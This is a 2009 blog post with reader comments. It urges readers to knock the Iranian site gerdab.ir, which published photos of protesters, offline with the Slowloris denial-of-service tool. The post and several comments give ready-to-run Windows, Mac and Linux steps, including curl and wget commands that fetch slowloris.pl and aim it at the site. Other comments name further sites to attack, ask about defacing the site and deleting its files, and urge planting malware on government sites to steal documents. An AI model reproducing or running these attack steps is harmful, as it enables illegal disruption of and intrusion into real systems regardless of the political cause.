dimanche 28 juin 2009

How to help take down gerdab.ir in 5 easy steps


This is for Windows users. Instructions for Mac OS-X users down below..




This page on gerdab.ir shows faces of protesters in the previous Iran demonstrations.
We now very well what will happen to them if they get caught...

This ominous site can be bought down with your help in 5 easy steps (Windows only) :

1 - Download Slowloris here : http://www.megaupload.com/?d=P5BARST4

2 - Extract the files in slowloris.zip . You would obtain that :


3 - Execute QSlowloris.exe


4 - Change the target url to http://gerdab.ir and hit Fire (your firewall might ask you to allow access to the internet for QSlowloris.exe Allow it). Nothing special will show on screen, but slowloris will do its thing.


5 - Spread the word ! The more we are, the better we succeed !




Important to know :

- Slowloris mode of attack will consume server threads, not bandwidth. This means that iranian internet will not be clogged and will stay useable which is very important. Only http://gerdab.ir will suffer from this attack.

- Slowloris is even more efficient if run on linux. If you feel you are tech-savvy, try to run a linux boot cd (no linux installation needed) on your computer, like http://www.puppylinux.org/downloads and run slowloris from it . Linux version is here : http://www.megaupload.com/?d=08RJVYTE



Please help the protesters and send addresses of similar ill-intended websites to
To run slowloris.pl on Mac OS X, open Terminal and type this (hit return at the end of each line):

mkdir -p ~/Source && cd ~/Source/
curl -O http://ha.ckers.org/slowloris/slowloris.pl
chmod +x slowloris.pl
./slowloris.pl --dns www.gerdab.ir -httpready

17 commentaires:

  1. To run slowloris.pl on Mac OS X, open Terminal and type this (hit return at the end of each line):

    mkdir -p ~/Source && cd ~/Source/
    curl -O http://ha.ckers.org/slowloris/slowloris.pl
    chmod +x slowloris.pl
    ./slowloris.pl --dns www.gerdab.ir

    RépondreSupprimer
  2. is there a way to deface that site? or better yet,
    delet their files? something like that? They are terroists they must be stopped.

    RépondreSupprimer
  3. hi, I want to help with this using sloris but have one question: Can my ip address be tracked back to me? Safety issues on my mind!

    thank you!

    Gal in Canada

    RépondreSupprimer
  4. Ce commentaire a été supprimé par l'auteur.

    RépondreSupprimer
  5. mac is up and running. Is there a way to dertermine the effect?

    RépondreSupprimer
  6. Linux Instruction:
    1. Make sure Perl module implementing object oriented interface to SSL sockets is installed. For debian based distros like ubuntu the package name is libio-socket-ssl-perl. For other distors it should be something similar

    2.
    mkdir -p ~/Source && cd ~/Source/
    wget http://ha.ckers.org/slowloris/slowloris.pl
    chmod +x slowloris.pl
    ./slowloris.pl --dns www.gerdab.ir -httpready

    RépondreSupprimer
  7. Here is another website devoted to Identifying arresting and torturing innocent protestors in Iran. www.itanz.net Please help us take it down!

    RépondreSupprimer
  8. here's another site to possibly bring down.
    Nahalnews.com

    RépondreSupprimer
  9. We need to make a package with an IP generator preferably Iran like IPs so we could come up with a dangerous distributed DOS solution not only for gerdab but also for their entire web sites.

    RépondreSupprimer
  10. this site is the one with the most info that i've seen yet:
    iran.whyweprotest.net

    go to "Help Iran online" and then "Moar Gerdab shite"

    there is also "condensed list of sites w/pictures" & a lott of other resources

    RépondreSupprimer
  11. Honestly, if you want to do serious damage - You need to adopt the approach of RBN and the BIG BOYS.

    Infect the major gov sites with parasites that infect visiting computers. That way you suddenly control and have access to Basiji/Sepah and internal systems all over and can mount a severe attack and get the documents out of the regime that can be used for something proper.

    Come on, you can do this much more efficient than this little sucker.

    Remember when you've infiltrated the "internal" network, you have unlimited bandwidth and only need a microscopic communication in and out of the country.

    If possible, dump the stolen information on various private devices and servers around the country - this can be used to our advantage.

    Now go make a real cyber war, please.

    RépondreSupprimer
  12. go to:
    http://www.google.com/webmasters/tools/removals

    after Sign in select
    "Inappropriate webpage or image that appears in our SafeSearch filtered results"

    and click Next and then in the "Webpage or image URL:" section type(copy) following URLs:

    http://gerdab.ir/fa/pages/?cid=422
    http://gerdab.ir/fa/pages/?cid=407
    http://gerdab.ir/fa/pages/?cid=560

    and type(copy) all the following words in the "Term(s) you entered to find these URL(s):" section

    اغتشاشگران را شناسایی کنید
    اغتشاشگران و حرمت شکنان عاشورای حسینی را شناسایی کنید
    gerdab
    گرداب

    finlly click on "Submit Request"

    RépondreSupprimer
  13. go to:
    http://www.google.com/support/websearch/bin/request.py?form_type=user&stage=fm&user_type=user&contact_type=privacy&hl=en

    type your name and email address
    then from drop down box select "Web Search"
    in the "Subject" line type "removing Gerdab.ir from serach results"
    and in the "Full description" type the followings:

    Fars news agency supports Ahmadinejad and controls a group closely affiliated with the revolutionary guards. It has made close-up shots of protesters in Teheran and publishes these with the caption: "Pictures of several troublemakers!" Now the website "Gerdab.ir", controlled by the revolutionary guard, takes these pictures, marks all faces and asks visitors to send identifying information for these persons. Other photos are marked as "identified".

    finally click on "Submit"

    RépondreSupprimer
  14. go to:
    https://www.google.com/webmasters/tools/spamreport?pli=1

    in the "The specific web page or site that is misbehaving:" box type(copy)the following URL:

    http://www.gerdab.ir/

    in the "Exact query that shows a problem (copy this from the Google search box):" box type(copy)the following words:

    اغتشاشگران را شناسایی کنید اغتشاشگران و حرمت شکنان عاشورای حسینی را شناسایی کنید gerdab
    گرداب

    In the "Resulting Google page that shows problem (copy the Google URL):" box type(copy)the following adress:


    http://www.google.com/search?client=opera&rls=en&q=%D8%A7%D8%BA%D8%AA%D8%B4%D8%A7%D8%B4%DA%AF%D8%B1%D8%A7%D9%86+%D8%B1%D8%A7+%D8%B4%D9%86%D8%A7%D8%B3%D8%A7%DB%8C%DB%8C+%DA%A9%D9%86%DB%8C%D8%AF+%D8%A7%D8%BA%D8%AA%D8%B4%D8%A7%D8%B4%DA%AF%D8%B1%D8%A7%D9%86+%D9%88+%D8%AD%D8%B1%D9%85%D8%AA+%D8%B4%DA%A9%D9%86%D8%A7%D9%86+%D8%B9%D8%A7%D8%B4%D9%88%D8%B1%D8%A7%DB%8C+%D8%AD%D8%B3%DB%8C%D9%86%DB%8C+%D8%B1%D8%A7+%D8%B4%D9%86%D8%A7%D8%B3%D8%A7%DB%8C%DB%8C+%DA%A9%D9%86%DB%8C%D8%AF+gerdab+%DA%AF%D8%B1%D8%AF%D8%A7%D8%A8&sourceid=opera&ie=utf-8&oe=utf-8

    Check some of boxes in the "Type(s) of problem (check all that apply):" section

    click "Report spam"

    RépondreSupprimer
  15. some of web sites and their emails publishing pictures of protesters like gerdab.ir

    http://www.irandiplomacy.ir/modules/news/article.php?storyid=3309
    http://www1.farsnews.com/newstext.php?nn=8804010238
    http://www.ourpresident.ir/news/special/546
    http://کلمه.ايستگاه.com/2009/06/blog-post_25.html
    http://majid14.blogfa.com/post-632.aspx
    http://www.rahva.ir/component/content/article/46-1387-09-22-21-44-01/1750-news.html
    http://www.ghatar.com/1388.04.01/ghatar17179/
    http://payanews.com/?id=997

    http://www.persianv.com/entekhab/064564.php
    ads@persianv.com
    info@persianv.com

    http://islamic.mihanblog.com/post/629
    masood.ir@gmail.com

    http://www.sook.ir/viewnews.aspx?id=2208
    info@arad-itc.com

    http://www.iranclubs.net/forums/showthread.php?t=25310
    http://siyasatsabz.blogfa.com/post-132.aspx
    shabanpoor60@yahoo.com

    http://www.irdc.ir/fa/content/7203/default.aspx
    sardabir@irdc.ir
    entesharat@irdc.ir
    pajooheshi@irdc.ir

    RépondreSupprimer